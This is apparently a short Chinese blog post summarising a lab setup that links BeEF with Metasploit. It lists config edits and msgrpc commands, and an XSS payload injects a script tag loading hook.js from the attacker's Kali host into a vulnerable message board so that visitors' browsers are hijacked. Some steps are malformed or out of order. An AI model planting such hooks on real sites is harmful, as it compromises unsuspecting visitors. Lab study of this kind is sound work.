参考了网络很多大神文章,简单小结一下,仅供参考
1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true
2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip
3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole
4,msf终端内输入命令 load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 //ServerHost为kali ip,User&Pass为2步骤配置的账号密码
5,修改beef默认账号密码, vim /etc/beef-xss/config.yaml //修改 User:beef,Password:beef
6,启动beef, beef-xss
1.Kali:IP:192.168.126.140
2.web服务器IP:192.168.126.205 存在XSS跨站脚本漏洞
3.客户端IP:192.168.126.130
4.Kali使用beef生成恶意代码网络
5.浏览器输入 http://127.0.0.1:3000/ui/panel,登陆beef,Usename与Password均为beef
6.将Hook URL “<scriptsrc=“http://1192.168.126.140:3000/hook.js”>”写入存在XSS漏洞的web服务器文本框
7.只要客户端访问服务器192.168.126.205留言板,客户端浏览器就会被劫持框
service postgresql start //启动msf数据库
msfconsole //启动msf
8.
beef +metasploit关联
最新推荐文章于 2023-01-19 15:54:06 发布
本文档总结了如何将Beef与Metasploit关联,以利用XSS漏洞控制客户端系统。首先,配置Beef的Metasploit模块,然后启动Metasploit框架和PostgreSQL数据库服务。接着,搜索并利用ms10_002漏洞,设置攻击载荷,通过Beef生成的恶意代码植入到存在XSS漏洞的服务器,当客户端访问时,触发漏洞,实现远程控制。
摘要由CSDN通过智能技术生成